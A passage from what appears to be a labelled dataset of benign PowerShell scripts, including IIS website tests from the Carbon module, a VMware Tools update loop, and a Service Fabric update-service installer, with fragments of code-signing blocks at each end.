Yz42M1ksqASl2j+ulObFIWcuy/paLjWhMSulehEA8Zb+YQ89fR6Y0TgJ0Eh09aK5 # +GARB7q/+a+gRIw7nfrwmjMkXAwL+9lmbc1X64fEUuKY2NVdksjKC7xRKNMb5i50 # NQyVN9neCJKIVSQDiBMXGgtDkAqPe1sH7/NGGQZKCXhIg3f3caq7dr/mZoiVAIOB # XtHr++65DqG61aWyZV5tCfzSvXFvLpL0dbu14gH6gEo5Zvlp226Vk+HKr/cQ2Ynj # /xXw/5UWHvmKwDOAkA/ld64jA4m466aoP2tKse8z1kSa/zw1wRSp0bwPn23gj2IO # NmEG9dM9Lv3c5FH+oBKNuqJ2Vj5viCHVZEcw40UDQqdfboVK+Y1XSkNfa1CUjzCu # Q2J3XMrfVK9ZCecopoCAXzYem7e/G/Md3rTQky2PTf7Z1hgYlqxisPoGEV3nguIg # ooMbBkHbl/4iWAB237woZFlX0imdO5se7el67/nx58CSLYjNmj82Y4cthnFOrwP4 # mUW7zVXlq9sZP9fCcrdrNMUF4KYS2x7/IIgHURKvOTjyT6f+ZRedEfwOlM1D12/l # eL1OX+dPZq5BGGHal3r1xbLdLxHUlMg+IJJk0wmMwmSF3kzbqbMUTaM1FX9x0+E8 # 4YVlsJB1ttLHMIIGcDCCBFigAwIBAgIQce9VdK81VMNaLGn2b0trzTANBgkqhkiG # 9w0BAQ0FADBpMQswCQYDVQQGEwJVUzEWMBQGA1UECgwNRW50cnVzdCwgSW5jLjFC # MEAGA1UEAww5RW50cnVzdCBDb2RlIFNpZ25pbmcgUm9vdCBDZXJ0aWZpY2F0aW9u # IEF1dGhvcml0eSAtIENTQlIxMB4XDTIxMDUwNzE5MjA0NVoXDTQwMTIyOTIzNTkw # MFowTzELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUVudHJ1c3QsIEluYy4xKDAmBgNV # BAMTH0VudHJ1c3QgQ29kZSBTaWduaW5nIENBIC0gT1ZDUzIwggIiMA0GCSqGSIb3 # DQEBAQUAA4ICDwAwggIKAoICAQCemXYXGp5WFwhjLJNNg2GEMzQCttlioN7CDrkg # TMhXnQ/dVFsNDNYB3S9I4ZEJ4dvIFQSCtnvw2NYwOxlxcPuoppf2KV2kDKn0Uz5X # 2wxObvx2218k6apfQ+OT5w7PyiW8xEwwC1oP5gb05W4MmWZYT4NhwnN8XCJvAUXF # D/dAT2RL0BcKqQ4eAi+hj0zyZ1DbPuSfwk8/dOsxpNCU0Jm8MJIJasskzaLYdlLQ # TnWYT2Ra0l6D9FjAXWp1xNg/ZDqLFA3YduHquWvnEXBJEThjE27xxvq9EEU1B+Z2 # FdB1FqrCQ1f+q/5jc0YioLjz5MdwRgn5qTdBmrNLbB9wcqMH9jWSdBFkbvkC1cCS # lfGXWX4N7qIl8nFVuJuNv83urt37DOeuMk5QjaHf0XO/wc5/ddqrv9CtgjjF54jt # om06hhG317DhqIs7DEEXml/kW5jInQCf93PSw+mfBYd5IYPWC+3RzAif4PHFyVi6 # U1/Uh7GLWajSXs1p0D76xDkJr7S17ec8+iKH1nP5F5Vqwxz1VXhf1PoLwFs/jHgV # DlpMOm7lJpjQJ8wg38CGO3qNZUZ+2WFeqfSuPtT8r0XHOrOFBEqLyAlds3sCKFnj # hn2AolhAZmLgOFWDq58pQSa6u+nYZPi2uyhzzRVK155z42ZMsVGdgSOLyIZ3srYs # NyJwIQIDAQABo4IBLDCCASgwEgYDVR0TAQH/BAgwBgEB/wIBADAdBgNVHQ4EFgQU # 75+6ebBz8iUeeJwDUpwbU4Teje0wHwYDVR0jBBgwFoAUgrrWPZfOn89x6JI3r/2z # tWk1V88wMwYIKwYBBQUHAQEEJzAlMCMGCCsGAQUFBzABhhdodHRwOi8vb2NzcC5l # bnRydXN0Lm5ldDAxBgNVHR8EKjAoMCagJKAihiBodHRwOi8vY3JsLmVudHJ1c3Qu # bmV0L2NzYnIxLmNybDAOBgNVHQ8BAf8EBAMCAYYwEwYDVR0lBAwwCgYIKwYBBQUH # AwMwRQYDVR0gBD4wPDAwBgRVHSAAMCgwJgYIKwYBBQUHAgEWGmh0dHA6Ly93d3cu # ZW50cnVzdC5uZXQvcnBhMAgGBmeBDAEEATANBgkqhkiG9w0BAQ0FAAOCAgEAXvOG # mTXBee7wEK/XkkPShdBb4Jig4HFRyRTLUJpgDrAEJkmxz+m6mwih2kNd1G8jorn4 # QMdH/k0BC0iQP8jcarQ+UzUovkBKR4VqHndAzIB/YbQ8T3mo5qOmoH5EhnG/EhuV # gXL3DaXQ3mefxqK48Wr5/P50ZsZk5nk9agNhTksfzCBiywIY7GPtfnE/lroLXmgi # Z+wfwNIFFmaxsqTq/MWVo40SpfWN7xsgzZn35zLzWXEf3ZTmeeVSIxBWKvxZOL+/ # eSWSasf9q2d3cbEEfTWtFME+qPwjF1YIGHzXeiJrkWrMNUVtTzudQ50FuJ3z/DQh # XAQYMlc4NMHKgyNGpogjIcZ+FICrse+7C6wJP+5TkTGz4lREqrV9MDwsI5zoP6NY # 6kAIF6MgX3rADNuq/wMWAw10ZCKalF4wNXYT9dPh4+AHytnqRYhGnFTVEOLzMglA # tudcFzL+zK/rbc9gPHXz7lxgQFUbtVmvciNoTZx0BAwQya9QW6cNZg+W5ZqV4CCi # GtCw7jhJnipnnpGWbJjbxBBtYHwebkjntn6vMwcSce+9lTu+qYPUQn23pzTXX4aR # ta9WWNpVfRe927zNZEEVjTFRBk+0LrKLPZzzTeNYA1TMrIj4UjxOS0YJJRn/Feen # mEYufbrq4+N8//m5GZW+drkNebICURpKyJ+IwkMxghoAMIIZ/AIBATBjME8xCzAJ # BgNVBAYTAlVTMRYwFAYDVQQKEw1FbnRydXN0LCBJbmMuMSgwJgYDVQQDEx9FbnRy # dXN0IENvZGUgU2lnbmluZyBDQSAtIE9WQ1MyAhAG72bMRoaosrSE2hkrLWthMA0G # CWCGSAFlAwQCAQUAoIGsMBkGCSqGSIb3DQEJAzEMBgorBgEEAYI3AgEEMBwGCisG # AQQBgjcCAQsxDjAMBgorBgEEAYI3AgEVMC8GCSqGSIb3DQEJBDEiBCDqdPavN5Om # QO8kEovlgiG5aHtvAsmZTOHF5UKzOv1lDzBABgorBgEEAYI3AgEMMTIwMKAWgBQA # RABlAGwAbAAsACAASQBuAGMALqEWgBRodHRwOi8vd3d3LmRlbGwuY29tIDANBgkq # hkiG9w0BAQEFAASCAYBH8A4OFUr5GjNjxt+XtX0yWxkPueQmRprYgaiqNKlUBRBJ # YNQXvK4uQRBJyeRDlQR2IYjJjLcNfvCxOCDe39lAjSqsFIPH7fmeBC3QMCaA/p7h # udfIKYXjZ7IvKrXzHpyn6r+vGiCMAUp/J7hwqikKkt0ylKNIBzsct/8i5ZAmUccf # ppLfApr2CK8ddmXWkRtE6fpYAMH5lDNSDlYGKRXI4DF4TE+Gia6eIgSvJ+dM8FEj # uFypMkyM9M6hAC3kY+7wZdQxOjOG2IEvYVNPQ5IsE2AT2Pt7xHVpvoDL0N8l+VCs # 3SSRFemqEo6RDnDxTPLXx9jwjgvk47YBm99SRu7gNh4aH8Bd72DreyjbT6dlsxRA # 49YYuVRGV9eOtB6+PGicIJolmk/DbYQwmpZVDgUvzD2K40Pb7Hp8Fp9ndAs3KMdg # PUrZHFRIQJgu7nlhGAT8HiwxuPl6Od6TKmGvbHS4bsGpzjY1gRxVmPAMAng0qMqj # 851RB1LadF4j0sqVaS2hghc/MIIXOwYKKwYBBAGCNwMDATGCFyswghcnBgkqhkiG # 9w0BBwKgghcYMIIXFAIBAzEPMA0GCWCGSAFlAwQCAQUAMHcGCyqGSIb3DQEJEAEE # oGgEZjBkAgEBBglghkgBhv1sBwEwMTANBglghkgBZQMEAgEFAAQg1FlaVEEX6Afw # agNcKFakEnNaotYB+Ui3l3/rnYLMxyoCEAmyjR7Wu0yCEowQaOO8PFIYDzIwMjQw # OTIwMDY1NDIyWqCCEwkwggbCMIIEqqADAgECAhAFRK/zlJ0IOaa/2z9f5WEWMA0G # CSqGSIb3DQEBCwUAMGMxCzAJBgNVBAYTAlVTMRcwFQYDVQQKEw5EaWdpQ2VydCwg # SW5jLjE7MDkGA1UEAxMyRGlnaUNlcnQgVHJ1c3RlZCBHNCBSU0E0MDk2IFNIQTI1 # NiBUaW1lU3RhbXBpbmcgQ0EwHhcNMjMwNzE0MDAwMDAwWhcNMzQxMDEzMjM1OTU5 # WjBIMQswCQYDVQQGEwJVUzEXMBUGA1UEChMORGlnaUNlcnQsIEluYy4xIDAeBgNV # BAMTF0RpZ2lDZXJ0IFRpbWVzdGFtcCAyMDIzMIICIjANBgkqhkiG9w0BAQEFAAOC # Ag8AMIICCgKCAgEAo1NFhx2DjlusPlSzI+DPn9fl0uddoQ4J3C9Io5d6OyqcZ9xi # FVjBqZMRp82qsmrdECmKHmJjadNYnDVxvzqX65RQjxwg6seaOy+WZuNp52n+W8PW # KyAcwZeUtKVQgfLPywemMGjKg0La/H8JJJSkghraarrYO8pd3hkYhftF6g1hbJ3+ # cV7EBpo88MUueQ8bZlLjyNY+X9pD04T10Mf2SC1eRXWWdf7dEKEbg8G45lKVtUfX # eCk5a+B4WZfjRCtK1ZXO7wgX6oJkTf8j48qG7rSkIWRw69XloNpjsy7pBe6q9iT1 # HbybHLK3X9/w7nZ9MZllR1WdSiQvrCuXvp/k/XtzPjLuUjT71Lvr1KAsNJvj3m5k # GQc3AZEPHLVRzapMZoOIaGK7vEEbeBlt5NkP4FhB+9ixLOFRr7StFQYU6mIIE9Np # HnxkTZ0P387RXoyqq1AVybPKvNfEO2hEo6U7Qv1zfe7dCv95NBB+plwKWEwAPoVp # dceDZNZ1zY8SdlalJPrXxGshuugfNJgvOuprAbD3+yqG7HtSOKmYCaFxsmxxrz64 # b5bV4RAT/mFHCoz+8LbH1cfebCTwv0KCyqBxPZySkwS0aXAnDU+3tTbRyV8IpHCj # 7ArxES5k4MsiK8rxKBMhSVF+BmbTO77665E42FEHypS34lCh8zrTioPLQHsCAwEA # AaOCAYswggGHMA4GA1UdDwEB/wQEAwIHgDAMBgNVHRMBAf8EAjAAMBYGA1UdJQEB # /wQMMAoGCCsGAQUFBwMIMCAGA1UdIAQZMBcwCAYGZ4EMAQQCMAsGCWCGSAGG/WwH # ATAfBgNVHSMEGDAWgBS6FtltTYUvcyl2mi91jGogj57IbzAdBgNVHQ4EFgQUpbbv # E+fvzdBkodVWqWUxo97V40kwWgYDVR0fBFMwUTBPoE2gS4ZJaHR0cDovL2NybDMu # ZGlnaWNlcnQuY29tL0RpZ2lDZXJ0VHJ1c3RlZEc0UlNBNDA5NlNIQTI1NlRpbWVT # dGFtcGluZ0NBLmNybDCBkAYIKwYBBQUHAQEEgYMwgYAwJAYIKwYBBQUHMAGGGGh0 # dHA6Ly9vY3NwLmRpZ2ljZXJ0LmNvbTBYBggrBgEFBQcwAoZMaHR0cDovL2NhY2Vy # dHMuZGlnaWNlcnQuY29tL0RpZ2lDZXJ0VHJ1c3RlZEc0UlNBNDA5NlNIQTI1NlRp # bWVTdGFtcGluZ0NBLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAgRrW3qCptZgXvHCN # T4o8aJzYJf/LLOTN6l0ikuyMIgKpuM+AqNnn48XtJoKKcS8Y3U623mzX4WCcK+3t # PUiOuGu6fF29wmE3aEl3o+uQqhLXJ4Xzjh6S2sJAOJ9dyKAuJXglnSoFeoQpmLZX # eY/bJlYrsPOnvTcM2Jh2T1a5UsK2nTipgedtQVyMadG5K8TGe8+c+njikxp2oml1 # 01DkRBK+IA2eqUTQ+OVJdwhaIcW0z5iVGlS6ubzBaRm6zxbygzc0brBBJt3eWpdP # M43UjXd9dUWhpVgmagNF3tlQtVCMr1a9TMXhRsUo063nQwBw3syYnhmJA+rUkTfv # TVLzyWAhxFZH7doRS4wyw4jmWOK22z75X7BC1o/jF5HRqsBV44a/rCcsQdCaM0qo # NtS5cpZ+l3k4SF/Kwtw9Mt911jZnWon49qfH5U81PAC9vpwqbHkB3NpE5jreODsH # XjlY9HxzMVWggBHLFAx+rrz+pOt5Zapo1iLKO+uagjVXKBbLafIymrLS2Dq4sUaG # a7oX/cR3bBVsrquvczroSUa31X/MtjjA2Owc9bahuEMs305MfR5ocMB3CtQC4Fxg # uyj/OOVSWtasFyIjTvTs0xf7UGv/B3cfcZdEQcm4RtNsMnxYL2dHZeUbc7aZ+Wss # BkbvQR7w8F/g29mtkIBEr4AQQYowggauMIIElqADAgECAhAHNje3JFR82Ees/Shm # Kl5bMA0GCSqGSIb3DQEBCwUAMGIxCzAJBgNVBAYTAlVTMRUwEwYDVQQKEwxEaWdp # Q2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5jb20xITAfBgNVBAMTGERp # Z2lDZXJ0IFRydXN0ZWQgUm9vdCBHNDAeFw0yMjAzMjMwMDAwMDBaFw0zNzAzMjIy # MzU5NTlaMGMxCzAJBgNVBAYTAlVTMRcwFQYDVQQKEw5EaWdpQ2VydCwgSW5jLjE7 # MDkGA1UEAxMyRGlnaUNlcnQgVHJ1c3RlZCBHNCBSU0E0MDk2IFNIQTI1NiBUaW1l # U3RhbXBpbmcgQ0EwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDGhjUG # SbPBPXJJUVXHJQPE8pE3qZdRodbSg9GeTKJtoLDMg/la9hGhRBVCX6SI82j6ffOc # iQt/nR+eDzMfUBMLJnOWbfhXqAJ9/UO0hNoR8XOxs+4rgISKIhjf69o9xBd/qxkr # PkLcZ47qUT3w1lbU5ygt69OxtXXnHwZljZQp09nsad/ZkIdGAHvbREGJ3HxqV3rw # N3mfXazL6IRktFLydkf3YYMZ3V+0VAshaG43IbtArF+y3kp9zvU5EmfvDqVjbOSm # xR3NNg1c1eYbqMFkdECnwHLFuk4fsbVYTXn+149zk6wsOeKlSNbwsDETqVcplicu # 9Yemj052FVUmcJgmf6AaRyBD40NjgHt1biclkJg6OBGz9vae5jtb7IHeIhTZgirH # kr+g3uM+onP65x9abJTyUpURK1h0QCirc0PO30qhHGs4xSnzyqqWc0Jon7ZGs506 # o9UD4L/wojzKQtwYSH8UNM/STKvvmz3+DrhkKvp1KCRB7UK/BZxmSVJQ9FHzNklN # iyDSLFc1eSuo80VgvCONWPfcYd6T/jnA+bIwpUzX6ZhKWD7TA4j+s4/TXkt2ElGT # yYwMO1uKIqjBJgj5FBASA31fI7tk42PgpuE+9sJ0sj8eCXbsq11GdeJgo1gJASgA # DoRU7s7pXcheMBK9Rp6103a50g5rmQzSM7TNsQIDAQABo4IBXTCCAVkwEgYDVR0T # AQH/BAgwBgEB/wIBADAdBgNVHQ4EFgQUuhbZbU2FL3MpdpovdYxqII+eyG8wHwYD # VR0jBBgwFoAU7NfjgtJxXWRM3y5nP+e6mK4cD08wDgYDVR0PAQH/BAQDAgGGMBMG # A1UdJQQMMAoGCCsGAQUFBwMIMHcGCCsGAQUFBwEBBGswaTAkBggrBgEFBQcwAYYY # aHR0cDovL29jc3AuZGlnaWNlcnQuY29tMEEGCCsGAQUFBzAChjVodHRwOi8vY2Fj # ZXJ0cy5kaWdpY2VydC5jb20vRGlnaUNlcnRUcnVzdGVkUm9vdEc0LmNydDBDBgNV # HR8EPDA6MDigNqA0hjJodHRwOi8vY3JsMy5kaWdpY2VydC5jb20vRGlnaUNlcnRU # cnVzdGVkUm9vdEc0LmNybDAgBgNVHSAEGTAXMAgGBmeBDAEEAjALBglghkgBhv1s # BwEwDQYJKoZIhvcNAQELBQADggIBAH1ZjsCTtm+YqUQiAX5m1tghQuGwGC4QTRPP # MFPOvxj7x1Bd4ksp+3CKDaopafxpwc8dB+k+YMjYC+VcW9dth/qEICU0MWfNthKW # b8RQTGIdDAiCqBa9qVbPFXONASIlzpVpP0d3+3J0FNf/q0+KLHqrhc1DX+1gtqpP # kWaeLJ7giqzl/Yy8ZCaHbJK9nXzQcAp876i8dU+6WvepELJd6f8oVInw1YpxdmXa # zPByoyP6wCeCRK6ZJxurJB4mwbfeKuv2nrF5mYGjVoarCkXJ38SNoOeY+/umnXKv # xMfBwWpx2cYTgAnEtp/Nh4cku0+jSbl3ZpHxcpzpSwJSpzd+k1OsOx0ISQ+UzTl6 # 3f8lY5knLD0/a6fxZsNBzU+2QJshIUDQtxMkzdwdeDrknq3lNHGS1yZr5Dhzq6YB # T70/O3itTK37xJV77QpfMzmHQXh6OOmc4d0j/R0o08f56PGYX/sr2H7yRp11LB4n # LCbbbxV7HhmLNriT1ObyF5lZynDwN7+YAN8gFk8n+2BnFqFmut1VwDophrCYoCvt # lUG3OtUVmDG0YgkPCr2B2RP+v6TR81fZvAT6gt4y3wSJ8ADNXcL50CN/AAvkdgIm # 2fBldkKmKYcJRyvmfxqkhQ/8mJb2VVQrH4D6wPIOK+XW+6kvRBVK5xMOHds3OBqh # K/bt1nz8MIIFjTCCBHWgAwIBAgIQDpsYjvnQLefv21DiCEAYWjANBgkqhkiG9w0B # AQwFADBlMQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYD # VQQLExB3d3cuZGlnaWNlcnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVk # IElEIFJvb3QgQ0EwHhcNMjIwODAxMDAwMDAwWhcNMzExMTA5MjM1OTU5WjBiMQsw # CQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cu # ZGlnaWNlcnQuY29tMSEwHwYDVQQDExhEaWdpQ2VydCBUcnVzdGVkIFJvb3QgRzQw # ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQC/5pBzaN675F1KPDAiMGkz # 7MKnJS7JIT3yithZwuEppz1Yq3aaza57G4QNxDAf8xukOBbrVsaXbR2rsnnyyhHS # 5F/WBTxSD1Ifxp4VpX6+n6lXFllVcq9ok3DCsrp1mWpzMpTREEQQLt+C8weE5nQ7 # bXHiLQwb7iDVySAdYyktzuxeTsiT+CFhmzTrBcZe7FsavOvJz82sNEBfsXpm7nfI # SKhmV1efVFiODCu3T6cw2Vbuyntd463JT17lNecxy9qTXtyOj4DatpGYQJB5w3jH # trHEtWoYOAMQjdjUN6QuBX2I9YI+EJFwq1WCQTLX2wRzKm6RAXwhTNS8rhsDdV14 # Ztk6MUSaM0C/CNdaSaTC5qmgZ92kJ7yhTzm1EVgX9yRcRo9k98FpiHaYdj1ZXUJ2 # h4mXaXpI8OCiEhtmmnTK3kse5w5jrubU75KSOp493ADkRSWJtppEGSt+wJS00mFt # 6zPZxd9LBADMfRyVw4/3IbKyEbe7f/LVjHAsQWCqsWMYRJUadmJ+9oCw++hkpjPR # iQfhvbfmQ6QYuKZ3AeEPlAwhHbJUKSWJbOUOUlFHdL4mrLZBdd56rF+NP8m800ER # ElvlEFDrMcXKchYiCd98THU/Y+whX8QgUWtvsauGi0/C1kVfnSD8oR7FwI+isX4K # Jpn15GkvmB0t9dmpsh3lGwIDAQABo4IBOjCCATYwDwYDVR0TAQH/BAUwAwEB/zAd # BgNVHQ4EFgQU7NfjgtJxXWRM3y5nP+e6mK4cD08wHwYDVR0jBBgwFoAUReuir/SS # y4IxLVGLp6chnfNtyA8wDgYDVR0PAQH/BAQDAgGGMHkGCCsGAQUFBwEBBG0wazAk # BggrBgEFBQcwAYYYaHR0cDovL29jc3AuZGlnaWNlcnQuY29tMEMGCCsGAQUFBzAC # hjdodHRwOi8vY2FjZXJ0cy5kaWdpY2VydC5jb20vRGlnaUNlcnRBc3N1cmVkSURS # b290Q0EuY3J0MEUGA1UdHwQ+MDwwOqA4oDaGNGh0dHA6Ly9jcmwzLmRpZ2ljZXJ0 # LmNvbS9EaWdpQ2VydEFzc3VyZWRJRFJvb3RDQS5jcmwwEQYDVR0gBAowCDAGBgRV # HSAAMA0GCSqGSIb3DQEBDAUAA4IBAQBwoL9DXFXnOF+go3QbPbYW1/e/Vwe9mqyh # hyzshV6pGrsi+IcaaVQi7aSId229GhT0E0p6Ly23OO/0/4C5+KH38nLeJLxSA8hO # 0Cre+i1Wz/n096wwepqLsl7Uz9FDRJtDIeuWcqFItJnLnU+nBgMTdydE1Od/6Fmo # 8L8vC6bp8jQ87PcDx4eo0kxAGTVGamlUsLihVo7spNU96LHc/RzY9HdaXFSMb++h # UD38dglohJ9vytsgjTVgHAIDyyCwrFigDkBjxZgiwbJZ9VVrzyerbHbObyMt9H5x # aiNrIv8SuFQtJ37YOtnwtoeW/VvRXKwYw02fc7cBqZ9Xql4o4rmUMYIDdjCCA3IC # AQEwdzBjMQswCQYDVQQGEwJVUzEXMBUGA1UEChMORGlnaUNlcnQsIEluYy4xOzA5 # BgNVBAMTMkRpZ2lDZXJ0IFRydXN0ZWQgRzQgUlNBNDA5NiBTSEEyNTYgVGltZVN0 # YW1waW5nIENBAhAFRK/zlJ0IOaa/2z9f5WEWMA0GCWCGSAFlAwQCAQUAoIHRMBoG # CSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAcBgkqhkiG9w0BCQUxDxcNMjQwOTIw # MDY1NDIyWjArBgsqhkiG9w0BCRACDDEcMBowGDAWBBRm8CsywsLJD4JdzqqKycZP # GZzPQDAvBgkqhkiG9w0BCQQxIgQgh+AxaM2Tw8EgJLKTfeEXnBeATvNA4AsDDpHn # CB98jX4wNwYLKoZIhvcNAQkQAi8xKDAmMCQwIgQg0vbkbe10IszR1EBXaEE2b4KK # 2lWarjMWr00amtQMeCgwDQYJKoZIhvcNAQEBBQAEggIAdVnePRPlydxmNMa7AJBA # OAATTirpKCZZMBnT6AFz9oapPm0cOmopF6AiW+1muZBuSNWX1qKfPIchZoCSE8A2 # MJ0SO1yzTMruTACOX1cs9eBm3p4G+Yj3CjbfvNtCjF2a6dxM+AAv/75dzJ2C+NXV # AaGOoraCwTaWJbvOZaWxBxJ35MA+lsmg4pDOKEe52FtVjAq1oar7GNOY6QM75jOj # gAcIiPyQzwaZB3KA6KjMUCxuism+wRLXRzdZrNMIUDoDo9kFySevIHwacdG+mJgu # k9HbSvJa1Hsog/tD7xrHiL1zJMlLxa2jQUigNHl4L3kozTpM4b82lReVAVkvylIN # HT32a8vBLBC/rU1pCzj5Y/Fd7gL5QlsjGH2GWfEPwKY1r0yNZO61Wha6KmR8Grhi # 0562eiadiCOYXZsG1IdVHJjh+kvQdkvZk2oXnuD++0nFNqAU+iBLuaTSS7LrzfYg # LdUBDdN0E2JA0Hjwa+edDFv8ivNErSNJsDsFZrF/OKvT/97xm1rqyIdZEjV4pcJo # BT7FMXz4n5apqOwlu/buJZIuOY+QzMT/4sYld72Os9UwUR/IuFlYV+PdR9aC9oDR # PBxS+qSVIX8F+AZhS1nurLR6ZJc+kctFDUn1Cifkb9oIkJj+roMt4V6171I4hM2e # X0S1LR8qQDBvSWg9Z3+wCdU= # SIG # End signature block
combined_dataset/train/non-malicious/1099.ps1
1099.ps1
$SiteName = 'TestSite' function Start-TestFixture { & (Join-Path -Path $PSScriptRoot '..\Initialize-CarbonTest.ps1' -Resolve) } function Start-Test { Remove-TestWebsite } function Stop-Test { Remove-TestWebsite } function Remove-TestWebsite { if( Test-IisWebsite -Name $SiteName ) { Uninstall-IisWebsite -Name $SiteName Assert-LastProcessSucceeded 'Unable to delete test site.' } } function Invoke-RemoveWebsite($Name = $SiteName) { Uninstall-IisWebsite $Name Assert-SiteDoesNotExist $Name } function Test-ShouldRemoveNonExistentSite { Invoke-RemoveWebsite 'fjsdklfsdjlf' } function Test-ShouldRemoveSite { Install-IisWebsite -Name $SiteName -Path $TestDir Assert-LastProcessSucceeded 'Unable to create site.' Invoke-RemoveWebsite Assert-SiteDoesNotExist $SiteName } function Assert-SiteDoesNotExist($Name) { Assert-False (Test-IisWebsite -Name $Name) "Website $Name exists!" }
combined_dataset/train/non-malicious/1102.ps1
1102.ps1
function Start-TestFixture { & (Join-Path -Path $PSScriptRoot '..\Initialize-CarbonTest.ps1' -Resolve) } function Test-ShouldGetIISVersion { $props = get-itemproperty hklm:\Software\Microsoft\InetStp $expectedVersion = $props.MajorVersion.ToString() + '.' + $props.MinorVersion.ToString() $actualVersion = Get-IISVersion Assert-Equal $expectedVersion $actualVersion "Didn't get the correct IIS version." }
combined_dataset/train/non-malicious/ciao.ps1
ciao.ps1
######################################################## # Created by Brian English # Brian.English@charlottefl.com # eddiephoenix@gmail.com # # for Charlotte County Government # No warranty suggested or implied ######################################################## # Purpose: Cycle through all VMs on a Virtualcenter Server # and update the VMTools after Virtualcenter update ######################################################## # Notes: VMware Tools must be installed prior to updating # it. After VMware Tools is updated, the virtual # machine is restarted if needed. See Vi Toolkit # CmdLets Reference: Update-Tools ######################################################## #connect to VirtualCenter server (i.e. virtual-center-1) if ($args[0] -eq $null) {$hostName = Read-Host "What host do you want to connect to?"} else {$hostName = $args[0]} #connect to selected Virtualcenter or host server Connect-VIServer $hostName ######################################################## #get all vms listed in virtualcenter $vms = get-vm ######################################################## #check power state on each vm #if 'On' update tools Foreach ($i in $vms) { #if virtualcenter is virtualized skip it # a system restart would stop this script if ((get-vm -name $i).Name -eq $hostname) {"Skipping " + $hostname} #if primary DC or DNS is virtualized skip it too #elseif ((get-vm -name $i).Name -eq "DNS/DC/DHCP") #{"Skipping DNS/DC/DHCP server name"} else { if ((get-vm -name $i).PowerState -eq "PoweredOn") { $i Get-Date -format "hh:mm:ss" update-tools -guest (get-vmguest -vm (get-vm -name $i)) Get-Date -format "hh:mm:ss" }#if #}#if }#foreach
combined_dataset/train/non-malicious/sample_32_35.ps1
sample_32_35.ps1
# ------------------------------------------------------------ # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License (MIT). See License.txt in the repo root for license information. # ------------------------------------------------------------ param ( [Parameter(Mandatory=$true)] [ValidateSet('install','uninstall')] [string] $Operation ) function Ensure-ServiceState($targetState) { Write-Host "Waiting for the service state to become $targetState" $svc = Get-WmiObject -Class Win32_Service -Filter "Name='ServiceFabricUpdateService'" while (($svc -eq $null) -or ($svc -ne $null -and $svc.State -ne $targetState)) { Start-Sleep -Seconds 3 $svc = Get-WmiObject -Class Win32_Service -Filter "Name='ServiceFabricUpdateService'" } Write-Host "The service state is $targetState as expected" } function Remove-Data($svcDirPath) { $dataDirPath = Join-Path $svcDirPath -ChildPath "Data" if (Test-Path $dataDirPath) { Write-Host "Cleaning up service data" Remove-Item -Path $dataDirPath -Recurse -Force } } $lastExitCode = 0 $Identity = [System.Security.Principal.WindowsIdentity]::GetCurrent() $Principal = New-Object System.Security.Principal.WindowsPrincipal($Identity) $IsAdmin = $Principal.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator) if(!$IsAdmin) { Write-host "Please run the script with administrative privileges." -ForegroundColor "Red" exit 1 } $service = Get-WmiObject -Class Win32_Service -Filter "Name='ServiceFabricUpdateService'" if ($Operation -eq 'install' -and $service -ne $null) { Write-host "The service is already installed." -ForegroundColor "Red" exit 1 } elseif ($Operation -eq 'uninstall' -and $service -eq $null) { Write-host "The service has not been installed." -ForegroundColor "Red" exit 1 } $svcDirPath = $(Split-Path -parent $MyInvocation.MyCommand.Definition) $svcExePath = Join-Path $svcDirPath -ChildPath "ServiceFabricUpdateService.exe" if(!(Test-Path $svcExePath)) { Write-host "Please keep the script right beside ServiceFabricUpdateService.exe." -ForegroundColor "Red" exit 1 } Write-host "Operation starts: $Operation" if ($Operation -eq 'install') { Remove-Data($svcDirPath) Start-Process -FilePath $svcExePath -ArgumentList "-install" -Wait Ensure-ServiceState('Stopped') Start-Service -Name "ServiceFabricUpdateService" Ensure-ServiceState('Running') } else { if ($service.State -ne 'Stopped') { $service.StopService() > $null Ensure-ServiceState('Stopped') } $service.Delete() > $null Remove-Data($svcDirPath) } if($lastExitCode -ne 0) { Write-host "The operation fails. Error code: $lastExitCode." -ForegroundColor "Red" exit 1 } else { Write-host "The operation succeeds." exit 0 } # SIG # Begin signature block # MIInvwYJKoZIhvcNAQcCoIInsDCCJ6wCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBFkMpvnyMXs0A0 # dvTm02jkBo6GMKArX/RU4krX8iGqGKCCDXYwggX0MIID3KADAgECAhMzAAADTrU8 # esGEb+srAAAAAANOMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMwMzE2MTg0MzI5WhcNMjQwMzE0MTg0MzI5WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDdCKiNI6IBFWuvJUmf6WdOJqZmIwYs5G7AJD5UbcL6tsC+EBPDbr36pFGo1bsU # p53nRyFYnncoMg8FK0d8jLlw0lgexDDr7gicf2zOBFWqfv/nSLwzJFNP5W03DF/1 # 1oZ12rSFqGlm+O46cRjTDFBpMRCZZGddZlRBjivby0eI1VgTD1TvAdfBYQe82fhm # WQkYR/lWmAK+vW/1+bO7jHaxXTNCxLIBW07F8PBjUcwFxxyfbe2mHB4h1L4U0Ofa # 